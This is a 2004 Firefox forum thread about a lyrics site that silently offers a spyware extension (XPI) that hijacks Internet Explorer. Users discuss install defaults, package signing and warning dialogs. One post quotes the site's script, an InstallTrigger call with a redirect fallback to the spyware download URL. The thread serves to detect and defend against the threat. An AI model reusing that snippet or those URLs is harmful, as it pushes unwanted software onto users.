MozillaZine

We got another XPISpyware

Discussion of general topics about Mozilla Firefox
esavior

User avatar
 
Posts: 1211
Joined: July 29th, 2003, 1:57 pm

Post Posted April 3rd, 2004, 9:53 am

http://www.musicsonglyrics.com/T/Thursd ... lyrics.htm

Its there alright. I could only get it to popup once. but after diging through the source its in a extrenal js file.
It grabs the XPI from:
http://www2.flingstone.com/cab/sbc_netscape.xpi
You can find the code in the 4th extrenal script call, the one with all the characters. I would just paste it here but I dont know the legality in pasting their code.
Mindjunk
I didn't hear no bell...

arch

User avatar
 
Posts: 85
Joined: May 4th, 2003, 8:58 am

Post Posted April 3rd, 2004, 10:47 am

I poked around xpi a bit. Here's the summary:

Xpi contains sbc_netscape.exe, it installs program called Bridge, which hijacks IE. Associated somehow with www.blazefind.com.
"No good deed goes ever unpunished"
http://archonon.sytes.net

chapas

User avatar
 
Posts: 186
Joined: March 22nd, 2004, 12:37 pm
Location: Buenos Aires, Argentina

Post Posted April 3rd, 2004, 11:24 am

Oh the irony....an xpi for mozilla to hijack IE. I hope Fx can't be hijacked as easily as IE. And now we have to get serious about what to do with these malicious XPIs T__T

AnonEmoose
 
Posts: 2031
Joined: February 6th, 2004, 11:59 am

Post Posted April 3rd, 2004, 11:34 am


esavior

User avatar
 
Posts: 1211
Joined: July 29th, 2003, 1:57 pm

Post Posted April 3rd, 2004, 2:01 pm

Mindjunk
I didn't hear no bell...

logan

User avatar
 
Posts: 3453
Joined: May 22nd, 2003, 3:51 pm
Location: NGC 2403

Post Posted April 3rd, 2004, 6:06 pm

chapas wrote:Oh the irony....an xpi for mozilla to hijack IE. I hope Fx can't be hijacked as easily as IE. And now we have to get serious about what to do with these malicious XPIs T__T


unless someone blindly changes the xpinstall.* defaults, it's not a problem.

Thesh

User avatar
 
Posts: 370
Joined: October 15th, 2003, 12:30 am

Post Posted April 3rd, 2004, 7:27 pm

logan wrote:unless someone blindly changes the xpinstall.* defaults, it's not a problem.


I disagree, there are people who hit accept for everything. The best solution is to simply disable it by default as per Bug 234068. This does not mean we shouldn't take further measures like having signed controls and making it so you can only install by clicking a link (both current bugs) as well as whitelists and blacklists.

nexx

User avatar
 
Posts: 736
Joined: July 29th, 2003, 1:23 am
Location: Brisbane, Australia

Post Posted April 3rd, 2004, 7:38 pm

iirc recent builds dont allow xpi installation unless the user specicially clicks on a link, so they wont popup when a page loads.
Extensions are a key part of firefox, and disabling them by default because a few sites may install spyware will probably cause more pain. Users will turn on xpiinstall to install their extensions and leave it on anyway.
<a href="http://users.bigpond.net.au/nexx1/oxpmenu/" title="Office XP Menus">Office XP Menus</a> || <a href="http://scragz.com/tech/mozilla/firefox-unofficial-branding.php"> Unofficial Firefox Branding</a>

esavior

User avatar
 
Posts: 1211
Joined: July 29th, 2003, 1:57 pm

Post Posted April 3rd, 2004, 9:27 pm

I actually agree with the disable by default... the people that turn it on and leave it on most likely understand what extensions are... atleast enough to know that they need to turn that option on. What I am concerned about is the newb user that the first time that see that popup is on a spywared site and wont know what to do, they my just press install. Try to remember that most people wont know what or even use extensions once fx starts getting mass deployment, everyone here uses extensions but we arent average users.
Mindjunk
I didn't hear no bell...

MonkeeSage

User avatar
 
Posts: 1011
Joined: December 20th, 2002, 8:15 pm

Post Posted April 3rd, 2004, 10:48 pm

I'd like to see a message box like AnonEmoose suggested, something along the lines of...

"This page is attempting to install [software name] on your computer using the Mozilla Installer. Software is potentially dangerous and can cause damage to your computer. In order to minimize the potential risk, you should only install software you have requested, from vendors you trust. If you understand this and wish to continue the installation, press INSTALL. If you do not understand this or did not request the software, press CANCEL."

...with the 'critical' icon on the prompt.


Shelumi`El
Jordan

S.D.G
"[M]en are usually satisfied with bad argument only when their convictions rest on other grounds." --John Oman

wildman

User avatar
 
Posts: 222
Joined: June 20th, 2003, 12:20 pm
Location: Florida

Post Posted April 4th, 2004, 4:15 pm

theshooter wrote:
logan wrote:unless someone blindly changes the xpinstall.* defaults, it's not a problem.


I disagree, there are people who hit accept for everything. The best solution is to simply disable it by default as per Bug 234068. This does not mean we shouldn't take further measures like having signed controls and making it so you can only install by clicking a link (both current bugs) as well as whitelists and blacklists.

Well said & it's worth repeating. We can thank Micro$oft again for some of the bad habits users develope, very few MS drivers are signed by MS so folks just tend to accept everything despite the warning. Signed Packages with md5sums, Approved Sources (white/black lists), and legitimate Quality Controls on mirrors which scan for virus/spyware/malware infections on the software they distribute. There are several similar threads in these forums. Here is one I wrote to try & summarize the problems with extensions from a sysadmin's point of view...

Extension Manager with AutoUpdate - MozillaZine Forums
http://forums.mozillazine.org/viewtopic.php?t=63373

wildman

User avatar
 
Posts: 222
Joined: June 20th, 2003, 12:20 pm
Location: Florida

Post Posted April 4th, 2004, 5:24 pm

I submitted the following to the devs at SpybotS&D via this link...
SpybotS&D: Contact - Detections
http://www.safer-networking.org/index.p ... detections
Name: wildman, Email address: guess_or_pm_me@pobox.com
Email subject: Mozilla/Firefox XPI apps
Report file: http://www2.flingstone.com/cab/sbc_netscape.xpi

Hope you can find the time to visit the MozillaZine Forums & participate in this discussion...

We got another XPISpyware - MozillaZine Forums - http://forums.mozillazine.org/viewtopic.php?t=66531

...and possibly support/contribute anti-spyware sollutions to thier project in the form of a SpyBot plugin/extension.

I made a similar comment on a Moz related blog recently, that may interest you.

Robert Accettura: Spyware Blaster Supports Mozilla
http://robert.accettura.com/archives/000347.shtml

esavior

User avatar
 
Posts: 1211
Joined: July 29th, 2003, 1:57 pm

Post Posted April 5th, 2004, 7:49 am

Just had it pop up at another site, same spyware though
http://www.lyricsdomain.com/2/brand_new/
Mindjunk
I didn't hear no bell...

Kraftwerk

User avatar
 
Posts: 106
Joined: April 2nd, 2004, 3:04 pm

Post Posted April 5th, 2004, 8:15 am

nexx wrote:iirc recent builds dont allow xpi installation unless the user specicially clicks on a link, so they wont popup when a page loads.

I'm using the 20040403 build and it still tries to install.. :/
there's some kind of stupid script trying to do that I guess, it's not in the html itself (I think)..

esavior

User avatar
 
Posts: 1211
Joined: July 29th, 2003, 1:57 pm

Post Posted April 5th, 2004, 9:01 am

aye its a extrenal script,

trys
InstallTrigger.install({'Free Access Plugin 1.117' : 'http://www2.flingstone.com/cab/sbc_netscape.xpi'});
and if that fails
location.replace('http://www2.flingstone.com/cab/sbc_netscape.xpi');
}

and I am using the newest build and still its happening.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7b) Gecko/20040404 Firefox/0.8.0+ (mmoy-O2-GL7-SSE2-crc32-gifalloc)
Mindjunk
I didn't hear no bell...

Return to Firefox General


Who is online

Users browsing this forum: No registered users and 3 guests